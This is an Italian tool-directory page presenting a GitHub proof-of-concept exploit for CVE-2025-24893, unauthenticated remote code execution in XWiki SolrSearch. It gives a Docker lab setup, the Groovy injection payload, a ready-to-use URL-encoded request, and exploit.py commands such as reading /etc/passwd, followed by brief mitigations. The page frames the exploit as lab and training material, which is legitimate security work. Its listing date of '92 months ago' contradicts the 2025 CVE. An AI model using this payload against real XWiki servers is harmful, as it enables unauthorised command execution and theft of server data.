Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
xwiki-cve-2025-24893 — Exploit di esecuzione remota di codice non autenticato per XWiki SolrSearch (CVE-2025-24893) tramite iniezione Groovy nel parametro text, con ambiente di laboratorio basato su Docker e script PoC. | Kitploit
Strumenti/GitHubGitHub/endusdksla/xwiki-cve-2025-24893
Analisi delle VulnerabilitàAnalisi del CodiceExploitSfruttamento di Applicazioni WebPenetration TestingApprendimento e Formazione
GitHubendusdksla/xwiki-cve-2025-24893

xwiki-cve-2025-24893

Exploit di esecuzione remota di codice non autenticato per XWiki SolrSearch (CVE-2025-24893) tramite iniezione Groovy nel parametro text, con ambiente di laboratorio basato su Docker e script PoC.

Vedi Repository
92 mesi faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

XWiki SolrSearch RCE non autenticata (CVE-2025-24893)


Contributori

  • White Hat School, 4ª generazione, classe 25 임두연(@endusdksla)

Riepilogo

  • XWiki interpreta la sintassi wiki e le macro lato server e le renderizza. Il problema è che la pagina Main.SolrSearch è aperta agli ospiti, eppure valuta il parametro text fornito dall'utente come sintassi XWiki senza una sufficiente validazione.
  • Un attaccante può inserire la macro {{groovy}} in text per eseguire codice Groovy arbitrario sul server, e può anche invocare comandi del sistema operativo tramite "command".execute(). Questa vulnerabilità può essere sfruttata con una singola richiesta GET, senza alcun login o token aggiuntivo.

Configurazione dell'ambiente

Questa directory configura l'ambiente vulnerabile utilizzando la distribuzione standalone ufficiale di XWiki 15.10.1 e il runtime Java 17.

ElementoContenuto
CVECVE-2025-24893
ProdottoXWiki Platform
Versione vulnerabile>= 5.3-milestone-2, < 15.10.11 / >= 16.0.0-rc-1, < 16.4.1
Versione corretta15.10.11, 16.4.1
Tipo di vulnerabilitàEval Injection -> RCE non autenticata
Necessità di autenticazioneNo
ImpattoPossibilità di eseguire comandi sul server

Condizioni di vulnerabilità

  • La versione di XWiki deve essere precedente alla patch.
  • L'endpoint Main.SolrSearch deve essere accessibile agli ospiti.
  • Il server deve essere in grado di valutare il parametro text come sintassi XWiki.
  • La macro groovy deve essere abilitata all'esecuzione.

Questo ambiente utilizza XWiki 15.10.1, quindi soddisfa le condizioni sopra indicate.

Procedura di riproduzione

root@kitploit:~
docker compose up -d --build

Durante l'esecuzione iniziale, l'installazione automatica procede, quindi potrebbero essere necessari alcuni minuti (circa 6-7 minuti).

root@kitploit:~
docker compose ps
docker inspect -f '{{json .State.Health}}' xwiki-web

Quando il risultato dei comandi precedenti mostra "Status":"healthy", la configurazione dell'ambiente è completa e pronta per lo sfruttamento.

root@kitploit:~
pip install requests

Installa la dipendenza prima di eseguire exploit.py.

Codice PoC

Il payload principale è il seguente.

root@kitploit:~
}}}{{async async=false}}{{groovy}}println("id".execute().text){{/groovy}}{{/async}}

Il payload sopra viene inserito nel parametro text e valutato nella pagina Main.SolrSearch. Di conseguenza, println("id".execute().text) viene eseguito sul server e il risultato dell'esecuzione del comando viene riflesso nel corpo della risposta RSS.

Fare riferimento a exploit.py per lo script di esecuzione completo.

root@kitploit:~
python3 exploit.py

Eseguendo il codice Python sopra si riproduce il PoC. Il comando predefinito è id.

root@kitploit:~
python3 exploit.py -c "cat /etc/passwd"

Per eseguire un comando diverso, passare l'argomento come mostrato sopra.

In alternativa, è possibile inviare una richiesta tramite URL (payload che restituisce id).

root@kitploit:~
http://localhost:1337/xwiki/bin/get/Main/SolrSearch?media=rss&text=%7D%7D%7D%7B%7Basync+async%3Dfalse%7D%7D%7B%7Bgroovy%7D%7Dprintln%28%22id%22.execute%28%29.text%29%7B%7B%2Fgroovy%7D%7D%7B%7B%2Fasync%7D%7D

Risultati dell'esecuzione

poc_id Risposta che mostra l'id

poc_ls Visualizzazione dei file nella directory corrente

Misure di mitigazione

  • Aggiornare XWiki alla versione 15.10.11 o successiva, oppure 16.4.1 o successiva.
  • Verificare le policy di accesso degli ospiti per le istanze XWiki esposte esternamente.
  • Minimizzare i permessi di esecuzione di script/macro non necessari.
  • Monitorare le richieste sospette e i log di accesso a SolrSearch.

Riferimenti

  • NVD: https://nvd.nist.gov/vuln/detail/CVE-2025-24893
  • GitHub Advisory: https://github.com/advisories/GHSA-rr6p-3pfg-562j
Scarica lo strumento